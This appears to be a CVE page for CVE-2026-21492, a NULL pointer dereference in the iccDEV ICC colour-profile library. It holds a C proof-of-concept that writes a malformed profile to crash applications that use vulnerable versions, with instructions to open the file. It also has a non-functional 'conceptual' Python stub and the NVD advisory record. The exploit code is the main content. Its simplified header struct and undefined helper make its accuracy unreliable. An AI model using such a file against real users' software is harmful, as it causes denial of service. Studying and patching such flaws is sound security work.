CVE-2026-21492

// CVE-2026-21492 PoC - NULL Pointer Dereference in iccDEV // This PoC generates a malformed ICC profile to trigger the vulnerability // Target: iccDEV < 2.3.1.2 #include <stdio.h> #include <stdlib.h> #include <string.h> // Simplified ICC Profile Header Structure typedef struct { char size[4]; // Profile size char cmm_type[4]; // CMM type signature char profile_version[4]; // Profile version char profile_class[4]; // Device class char color_space[4]; // Color space char pcs[4]; // PCS (Profile Connection Space) char creation_date[12]; // Creation date/time char signature[4]; // 'acsp' signature char platform[4]; // Primary platform char flags[4]; // Profile flags char device_manufacturer[4]; // Device manufacturer char device_model[4]; // Device model char device_attributes[4]; // Device attributes char rendering_intent[4]; // Rendering intent char pcs_illuminant[12]; // PCS illuminant char creator[4]; // Profile creator char id[16]; // Profile ID } ICC_Profile_Header; // Malformed tag structure to trigger NULL pointer typedef struct { char signature[4]; char offset[4]; char size[4]; } ICC_Tag; void create_malformed_icc_profile(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { printf("Failed to create file\n"); return; } // Create minimal ICC profile header ICC_Profile_Header header = {0}; memcpy(header.signature, "acsp", 4); memcpy(header.profile_class, "mntr", 4); memcpy(header.color_space, "RGB ", 4); memcpy(header.pcs, "Lab ", 4); // Set profile size (will be adjusted) int profile_size = 128 + 256; // header + tag table memcpy(header.size, &profile_size, 4); fwrite(&header, sizeof(ICC_Profile_Header), 1, fp); // Write padding to reach tag table unsigned char padding[128] = {0}; fwrite(padding, 128, 1, fp); // Tag count int tag_count = 1; fwrite(&tag_count, 4, 1, fp); // Malformed tag entry - point to invalid/missing data ICC_Tag tag = {0}; memcpy(tag.signature, "desc", 4); // Description tag int offset = 128 + 256 + 4 + 16; // Invalid offset memcpy(tag.offset, &offset, 4); int size = 0xFFFFFFFF; // Invalid size memcpy(tag.size, &size, 4); fwrite(&tag, sizeof(ICC_Tag), 1, fp); // Write additional malformed data fwrite(padding, 256, 1, fp); fclose(fp); printf("Malformed ICC profile created: %s\n", filename); printf("This profile triggers NULL pointer dereference in iccDEV < 2.3.1.2\n"); } int main() { printf("CVE-2026-21492 PoC Generator\n"); printf("Target: iccDEV < 2.3.1.2\n"); printf("Vulnerability: NULL Pointer Member Call\n\n"); create_malformed_icc_profile("malformed_profile.icc"); printf("\nUsage: Open malformed_profile.icc with an application\n"); printf("using iccDEV library to trigger the vulnerability.\n"); return 0; } // Alternative PoC in Python (using icc library if available) /* from icc import profile def trigger_cve_2026_21492(): """ Attempt to trigger NULL pointer dereference in iccDEV This requires a malformed ICC profile with invalid tag data """ try: # Create profile with malformed tags # This is a conceptual PoC - actual implementation depends on library version malformed_data = create_malformed_icc_bytes() profile.load(malformed_data) # Triggers NULL pointer access except Exception as e: print(f"Exception caught: {e}") print("Vulnerability may have been triggered") */

{"cve": {"id": "CVE-2026-21492", "sourceIdentifier": "[email protected]", "published": "2026-01-06T21:15:43.863", "lastModified": "2026-01-12T18:30:54.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a NULL pointer member call vulnerability. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del International Color Consortium (ICC). Las versiones anteriores a la 2.3.1.2 tienen una vulnerabilidad de llamada a miembro de puntero NULL. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La versión 2.3.1.2 contiene un parche. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/b200a629ada310137d6ae5c53fc9e6d91a4b0dae", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/e72361d215351cbac0002466c4f936e94d6a99e7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/394", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/401", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xpq3-v3jj-mgvx", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/394", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}]}}